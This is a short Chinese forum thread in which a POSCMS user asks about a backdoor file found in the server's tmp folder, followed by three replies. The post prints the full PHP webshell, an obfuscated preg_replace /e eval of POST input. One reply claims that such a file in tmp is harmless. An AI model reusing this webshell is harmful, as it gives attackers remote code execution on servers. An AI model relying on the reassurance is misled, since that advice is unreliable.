POSCMS 版主:POSCMS负责人
在服务器临时文件夹(tmp)出现后门文件。这是什么问题啊?
类型:POSCMS 更新时间:2019-06-11 11:42:58

在服务器临时文件夹(tmp)出现后门文件。

<?php
@$a = $_POST['x'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>


这是什么问题啊?

还有一部分加密代码。

或者怎么禁止产生缓存文件呢?

回帖
  • 迅睿粉丝
    #1楼    迅睿粉丝
    2019-06-11 11:34:12
    0
    服务器临时文件有这个文件没有安全威胁的,tmp不会被执行,放心
  • 迅睿粉丝
    #2楼    迅睿粉丝
    2019-06-11 11:35:29
    0
    判断来源,如果服务器只有pos程序,那必然是pos带过来的,如果有其他程序就难说还有新版的安全检测功能很强,安全配置一下应该不会被攻击
  • 迅睿粉丝
    #3楼    迅睿粉丝
    2019-06-11 11:42:58
    0
    主要看是不是从poscms写入的